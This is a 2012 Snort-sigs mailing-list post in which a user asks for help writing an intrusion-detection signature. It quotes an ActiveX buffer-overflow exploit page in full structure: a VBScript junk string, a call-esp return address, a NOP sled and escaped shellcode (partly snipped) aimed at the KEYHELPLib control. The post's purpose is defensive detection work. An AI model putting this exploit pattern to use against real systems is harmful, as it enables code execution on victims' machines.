[Snort-sigs] Problem writing a sig to capture vbscript unescape sequence

Bob Huber roberthuberjr at ...144...
Fri May 18 13:52:08 EDT 2012


I'm trying to write a sig for this ActiveX overflow:

<html>
<body>
<object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C' id='KEYHELPLib' />
</object>
<script language='vbscript'>
//executing calc
scode =      unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
             ...SNIP...
             unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
jnk = string(537,"A")
eip = unescape("%67%41%41%7e") '0x7E414167      call esp user32.dll
nop = string(16,unescape("%90"))
mapID=1
pstrChmFile= jnk + eip + nop + scode
pstrFrame="aaaaaaaa"
'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
</script>
</body>
</html>

The problem I'm having is trying to get a content match off of the line -    eip = unescape("%67%41%41%7e")
I can't figure out how to match that content.  I'm running both 2.8.5 and 2.9.2.  I was assuming it would see the <script> tag and it would try to decode javascript, and maybe that was the problem.  I've tried file_data, I've tried pkt_data. I've turned off javascript normalization, I've turned off extended_response_inspection.  No luck.

Any help appreciated.

Bob
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-sigs/attachments/20120518/df74c66f/attachment.html>


More information about the Snort-sigs mailing list